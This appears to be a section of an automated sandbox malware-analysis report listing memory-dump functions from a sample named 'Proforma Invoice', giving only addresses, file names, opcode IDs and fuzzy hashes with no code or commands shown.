                                                                                          • Instruction ID: 9e97bc0729f3e04901b2fbdaa9fba3a3c18c93e971a5200122cccc37487f6c13
                                                                                          • Opcode Fuzzy Hash: fe46aa6e4d071e142a3c72e012e7c125965d8611e5421247a6e88d713ece8668
                                                                                          • Instruction Fuzzy Hash: 9D011635B00158CFCB08DF6AE584AADB7F2FF89715F258499D005EB360DB74AD4A8B80
                                                                                          Function 0083D76C Relevance: .0, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453359666.000000000083D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_83d000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 830b8c51644fe4c6493859f18be89a66803bd22ca1eabb0c2cb4eec61f1a26aa
                                                                                          • Instruction ID: bc5262c5fb76140b193ebcd6771ed906eb92549ae987902449efdca7f289343b
                                                                                          • Opcode Fuzzy Hash: 830b8c51644fe4c6493859f18be89a66803bd22ca1eabb0c2cb4eec61f1a26aa
                                                                                          • Instruction Fuzzy Hash: D9F06271405344AEE7108A15D884B62FFD8EB91724F18C45AED488B686C2799C44CAB1
                                                                                          Function 008E08A8 Relevance: .0, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 29d7d1c60d43d94db016db68e40f1f80d2cc16b1cd3a8adea07a68e5ec61915d
                                                                                          • Instruction ID: 4eebc7d4d6f9b1a5cafb5d6645ef5c54f21cafedb251928af1cc9263c2a7cd77
                                                                                          • Opcode Fuzzy Hash: 29d7d1c60d43d94db016db68e40f1f80d2cc16b1cd3a8adea07a68e5ec61915d
                                                                                          • Instruction Fuzzy Hash: 20F0E232700625478202A63EE82096E37EAFAC66B0304453ED115DB304EF60DC064BC1
                                                                                          Function 06DC27C5 Relevance: .0, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 78d43f24c029188b2b6b38b5c3a461a795aefb9e76d01bd8565173edffc227b7
                                                                                          • Instruction ID: 097f4ace4a95047918a136bf9e4aa2ff1b8f43555dd05eda27fc3c083e467d13
                                                                                          • Opcode Fuzzy Hash: 78d43f24c029188b2b6b38b5c3a461a795aefb9e76d01bd8565173edffc227b7
                                                                                          • Instruction Fuzzy Hash: 3811A274A08228CFCB65DF58D8989D9B7F2FB98700F1041E9A609E7749EB345E899F40
                                                                                          Function 06DC690E Relevance: .0, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b98c26c357cf781b0c6a8fe285b1c175cda2bc427b37c6584b0f1ff89cc4ec1c
                                                                                          • Instruction ID: a8cc44658e9c0fbfcbe09a370dfc9b5f8f5f7e5100637b67935df726bf10c89c
                                                                                          • Opcode Fuzzy Hash: b98c26c357cf781b0c6a8fe285b1c175cda2bc427b37c6584b0f1ff89cc4ec1c
                                                                                          • Instruction Fuzzy Hash: 0C0119B0A0021ECFDB64DF58D889AAAB3B6FB49304F1080E8950DA7654CB349EC59F91
                                                                                          Function 06DC7E57 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6057b55a8daba2632a9e23d682aabf5675e5500219aab16a5603c4ebe4104a1e
                                                                                          • Instruction ID: 65d91b0acf00fa77eeaa7a5609e038cf41d35dd42564054b98f43c61859ab838
                                                                                          • Opcode Fuzzy Hash: 6057b55a8daba2632a9e23d682aabf5675e5500219aab16a5603c4ebe4104a1e
                                                                                          • Instruction Fuzzy Hash: 71F030B4A00218CFD754DF58D848A8DB3B6FB89310F1081E4E519E7394CB349E99DF51
                                                                                          Function 008EDEB0 Relevance: .0, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5a565c9cd6c9977203db4f67b9644aa97acdd42072b1fc63939e910f4bd40918
                                                                                          • Instruction ID: 652906abfdb8fc0fe014d4e814eb2a96ecbbc0bf0c05c94ff8d91aadfccb5f78
                                                                                          • Opcode Fuzzy Hash: 5a565c9cd6c9977203db4f67b9644aa97acdd42072b1fc63939e910f4bd40918
                                                                                          • Instruction Fuzzy Hash: 7FF01574D04208EFCB84DFA8C944AACBBB4FB49300F10C0AA981897350D7319A16DF80
                                                                                          Function 06DDD6E0 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de811be2351ef0c6d936989e9db7fa83d50a898014631dcef18b8efa41fce005
                                                                                          • Instruction ID: d63da6889595a3926bca3ba3a19efc59d372389ba3da8275662c7e9dac23cb5b
                                                                                          • Opcode Fuzzy Hash: de811be2351ef0c6d936989e9db7fa83d50a898014631dcef18b8efa41fce005
                                                                                          • Instruction Fuzzy Hash: 23E0C975D04208EFCB84DFA8D541AACBBF5FB48310F10C0A9D81893351D6319A55DF80
                                                                                          Function 06DDA788 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de811be2351ef0c6d936989e9db7fa83d50a898014631dcef18b8efa41fce005
                                                                                          • Instruction ID: 8a935a6025ee3961fb91d58172cdfbb87943ce8da99e6cee82e4e790112d0ac7
                                                                                          • Opcode Fuzzy Hash: de811be2351ef0c6d936989e9db7fa83d50a898014631dcef18b8efa41fce005
                                                                                          • Instruction Fuzzy Hash: F9E0C974D04208FFCB94DFA8D9406ACBBF4FB48310F14C0A9981893355D7319A51DF80
                                                                                          Function 06DDDDA0 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de811be2351ef0c6d936989e9db7fa83d50a898014631dcef18b8efa41fce005
                                                                                          • Instruction ID: 9ecfb378f1643b15f465f85b400d1eed3672f05d8feac3205397b6edcc0bc152
                                                                                          • Opcode Fuzzy Hash: de811be2351ef0c6d936989e9db7fa83d50a898014631dcef18b8efa41fce005
                                                                                          • Instruction Fuzzy Hash: 14E0C974E04208EFCB84DFA8D940AACBBF5EB88310F10C0A9981893351D6319A51DF80
                                                                                          Function 06DDBF58 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de811be2351ef0c6d936989e9db7fa83d50a898014631dcef18b8efa41fce005
                                                                                          • Instruction ID: afafcf3f47f9ba3c159f0230201cc5fab1a0160b74e6ba8505461e0793036b34
                                                                                          • Opcode Fuzzy Hash: de811be2351ef0c6d936989e9db7fa83d50a898014631dcef18b8efa41fce005
                                                                                          • Instruction Fuzzy Hash: 20E0C9B9D04208EFCB94DFA8D5406ACBBF4FB48314F10C0EA985893351D6329A52DF80
                                                                                          Function 06DD5F68 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de811be2351ef0c6d936989e9db7fa83d50a898014631dcef18b8efa41fce005
                                                                                          • Instruction ID: 4fed62e9d3c396ec3980a4affbd814528c30330ce145ed20d470a8d726b1aa87
                                                                                          • Opcode Fuzzy Hash: de811be2351ef0c6d936989e9db7fa83d50a898014631dcef18b8efa41fce005
                                                                                          • Instruction Fuzzy Hash: 05E0C9B5D05208EFCB84DFA8D5406ACBFF4FB48310F10C1E9985897351D6329A51DF80
                                                                                          Function 05A03F08 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: df5563af9b0b8050f67fe6c51c0e3a04dcc55f2e72fc623ebb248297c870dc8a
                                                                                          • Instruction ID: 76ff75633004dab60015b9b1ae4bb230bcaa946be70d876239562adf07522520
                                                                                          • Opcode Fuzzy Hash: df5563af9b0b8050f67fe6c51c0e3a04dcc55f2e72fc623ebb248297c870dc8a
                                                                                          • Instruction Fuzzy Hash: E7E0ED35908108EBCF05DF94E9409ADBF79FB49311F10D499EC1917391C7329A61EB91
                                                                                          Function 05A03660 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: df5563af9b0b8050f67fe6c51c0e3a04dcc55f2e72fc623ebb248297c870dc8a
                                                                                          • Instruction ID: c99293ed0dbd24280e8db093caca6c7b39c4d1982f05faa89fa90f701eed6852
                                                                                          • Opcode Fuzzy Hash: df5563af9b0b8050f67fe6c51c0e3a04dcc55f2e72fc623ebb248297c870dc8a
                                                                                          • Instruction Fuzzy Hash: E7E0ED35908108EBCF05DF94E940DADBF76FB49310F109499EC1517391C7329A61EB95
                                                                                          Function 05A01268 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: aeb4ac01d2f7a6861a7c7441053ebffcb0639844e58c5fa76fea032a59cbd01f
                                                                                          • Instruction ID: 31ecf33d78be570405c94f8697b0d6ec86546161e36763047a3fc0e9d7fab031
                                                                                          • Opcode Fuzzy Hash: aeb4ac01d2f7a6861a7c7441053ebffcb0639844e58c5fa76fea032a59cbd01f
                                                                                          • Instruction Fuzzy Hash: F3E03974809108AFCB80DF98D900AACBFB8EB49300F10C0AAEC5892381C6319A11DB90
                                                                                          Function 06DDF000 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b53983c677107793ee567bdf3b70024d5b6bd1b146775279749aaee48159922f
                                                                                          • Instruction ID: 832a323c13e0a3c3b73778e2f4aa48317ac87bd0a92d7e832ea382097e97d0da
                                                                                          • Opcode Fuzzy Hash: b53983c677107793ee567bdf3b70024d5b6bd1b146775279749aaee48159922f
                                                                                          • Instruction Fuzzy Hash: 5AE01A74D492089FD744EBB8D6497ADBBB8EB45202F1040A99949A3341DA745A40C795
                                                                                          Function 06DDA428 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 73f5fd3c1883d71c06f8e850aa13c4917b86e21e3cd96fe1e9a5f598e634e169
                                                                                          • Instruction ID: f2b930416fb7cbc1693d5173b804fb4b431705871f2b46256f11334069adaf1a
                                                                                          • Opcode Fuzzy Hash: 73f5fd3c1883d71c06f8e850aa13c4917b86e21e3cd96fe1e9a5f598e634e169
                                                                                          • Instruction Fuzzy Hash: B2E0E574E05208EFCB84EFA8D5456ACBBF8EB48200F14C0E9C81C93341DB719A02CF81
                                                                                          Function 06DDF5C8 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 73f5fd3c1883d71c06f8e850aa13c4917b86e21e3cd96fe1e9a5f598e634e169
                                                                                          • Instruction ID: e919161dd396b9f98adb869c30b752e955d3fcb50c6bed348fd8f85fe0b8b211
                                                                                          • Opcode Fuzzy Hash: 73f5fd3c1883d71c06f8e850aa13c4917b86e21e3cd96fe1e9a5f598e634e169
                                                                                          • Instruction Fuzzy Hash: 99E0E5B4E04208EFCB84EFA8D5406ACBBF8EB48300F10C0E9C81993341D7319A02CF80
                                                                                          Function 06DDA570 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 73f5fd3c1883d71c06f8e850aa13c4917b86e21e3cd96fe1e9a5f598e634e169
                                                                                          • Instruction ID: 6199c8862c2631ce5d811666986f97e86ee10656ffbb66e7b3379d73ee029355
                                                                                          • Opcode Fuzzy Hash: 73f5fd3c1883d71c06f8e850aa13c4917b86e21e3cd96fe1e9a5f598e634e169
                                                                                          • Instruction Fuzzy Hash: 4EE0E574E05208EFCB84EFA8D5406ACBBF8FB48300F14C0E9881897341E6319E02CF81
                                                                                          Function 05A00F88 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f4786ca8aed6aa90f5674299960314437aa151ce023ef26528fa1bb33a54f68e
                                                                                          • Instruction ID: 91041c9d237c81371fd21deabadf0d79ac662f314876b92351c5e474c13ca86e
                                                                                          • Opcode Fuzzy Hash: f4786ca8aed6aa90f5674299960314437aa151ce023ef26528fa1bb33a54f68e
                                                                                          • Instruction Fuzzy Hash: 37E0C974D08208EFC744DFA8D544AACBBF4FB49300F1080A9981893341D6319A02DB41
                                                                                          Function 008EE5E8 Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b680939138cafe2a6307696c4212c4fc5d95543f5d316ba045a4b22f11283bce
                                                                                          • Instruction ID: cecdf602e75ce5f123c64f2361cf116112d67139f21d4728969f4a237373271d
                                                                                          • Opcode Fuzzy Hash: b680939138cafe2a6307696c4212c4fc5d95543f5d316ba045a4b22f11283bce
                                                                                          • Instruction Fuzzy Hash: 44E0DF74808218ABC710CF94D90096CBFB8FB56304F208099D80893351C6319A02DB90
                                                                                          Function 06DD8B50 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 94dab061ce17172cd691cd75b5bcce3246622dff8cdfbb471605b7e1a9856be5
                                                                                          • Instruction ID: c7894bd53b485dd28477500adae56b32350f06be8e9dd3198b61562d174fb020
                                                                                          • Opcode Fuzzy Hash: 94dab061ce17172cd691cd75b5bcce3246622dff8cdfbb471605b7e1a9856be5
                                                                                          • Instruction Fuzzy Hash: A5E04F74D08208EFCB44DF98D5416BCFFB8EB49200F1480E9C85957381C6319A02DB84
                                                                                          Function 05A01158 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 987bce076d010543d4890352ac77067e7d67792ffa07bac2c3750e93c0410705
                                                                                          • Instruction ID: c7ec486874a6140b8d0139851a440440420577599d64bd1b11c8fcb058629977
                                                                                          • Opcode Fuzzy Hash: 987bce076d010543d4890352ac77067e7d67792ffa07bac2c3750e93c0410705
                                                                                          • Instruction Fuzzy Hash: 72E08674908208EBC704DF94E9409ACBFF9FB45310F10909DDC0413391C7319E52DB84
                                                                                          Function 008ECE50 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5f45c3d9dc7974876caaf4e14db40b2f2adc6544b3f96b63eaff1c1f0bc35987
                                                                                          • Instruction ID: 16b068633fd230cfc0e47e847e5bfb0ce10afc7bcfe99102b594e5e3c897392e
                                                                                          • Opcode Fuzzy Hash: 5f45c3d9dc7974876caaf4e14db40b2f2adc6544b3f96b63eaff1c1f0bc35987
                                                                                          • Instruction Fuzzy Hash: 13E08C71804208DFD740EFE4C90469A7BB8EB06211F0001A5E40993250EF315A00D7A5
                                                                                          Function 06DDE2B0 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d6c29c96c7e62e18942949512966d703d6436895528b214c6b0a83a24e4467b1
                                                                                          • Instruction ID: 81e3c1643821f6154e3eb64df344b556294eb670c37f288d21c1a50382aadfb8
                                                                                          • Opcode Fuzzy Hash: d6c29c96c7e62e18942949512966d703d6436895528b214c6b0a83a24e4467b1
                                                                                          • Instruction Fuzzy Hash: C3E01274D09208DFD754EF94D94156CBFB9FB46315F2081D9C80917351C7319E46DB85
                                                                                          Function 06DDB6B0 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 857adc1836722b57549c932258d411813fb49c8eded1b74e24ec3a36ad66d7b6
                                                                                          • Instruction ID: 551d4c661c863eeecbdbe64f3c28d8bc2e75b37829a9ebd81db52846e341cb2e
                                                                                          • Opcode Fuzzy Hash: 857adc1836722b57549c932258d411813fb49c8eded1b74e24ec3a36ad66d7b6
                                                                                          • Instruction Fuzzy Hash: 7FE012B1C05108EFC790FFF9C90066E7FF9EB46210F5105E5A50597251EA314A04D796
                                                                                          Function 05A01C10 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 74bcfcfe6be95681bc399a690e932b76861157d41a6d8e14b72265f0bbafbcf9
                                                                                          • Instruction ID: b33ca204378d42d62b5285526bd57ad52ae5166e41b6996dd3ed87920ee74846
                                                                                          • Opcode Fuzzy Hash: 74bcfcfe6be95681bc399a690e932b76861157d41a6d8e14b72265f0bbafbcf9
                                                                                          • Instruction Fuzzy Hash: A1E0EC74909208DBC704DB94E9419ACBBB9BB45315F2095D9C81917391D6319E42DB85
                                                                                          Function 05A01448 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 74bcfcfe6be95681bc399a690e932b76861157d41a6d8e14b72265f0bbafbcf9
                                                                                          • Instruction ID: 09df69920a979b213444ffbe6313b28c534dc0205bf91cc65128f255ff8a9a7f
                                                                                          • Opcode Fuzzy Hash: 74bcfcfe6be95681bc399a690e932b76861157d41a6d8e14b72265f0bbafbcf9
                                                                                          • Instruction Fuzzy Hash: 20E0C274D08208EBC704DF94E9409ACBFB8FB45305F2090DCC80827391CB329E02CB81
                                                                                          Function 05A00860 Relevance: .0, Instructions: 18COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e8a2eb9ceec923b87d98cafa0a8d79a8cfae1f7c7ebd2a82758c07f340b0460
                                                                                          • Instruction ID: a911181741cedb60ecf12392c03d5efe726e2a655cafddd3d7b9c6dd483e63ac
                                                                                          • Opcode Fuzzy Hash: 3e8a2eb9ceec923b87d98cafa0a8d79a8cfae1f7c7ebd2a82758c07f340b0460
                                                                                          • Instruction Fuzzy Hash: 95E08C34808208DFC704DBA8D54476CBFB8BB45201F1080D9C84853391D631DA06CB81
                                                                                          Function 008E0848 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bcf515542608614582ae36a57760fe03a9bb66eec784a56968b3a4d1dace3176
                                                                                          • Instruction ID: 63ccc92c79af8a4916e981c416dfbe114b1e961474ebac3a6b127ea60dfe4338
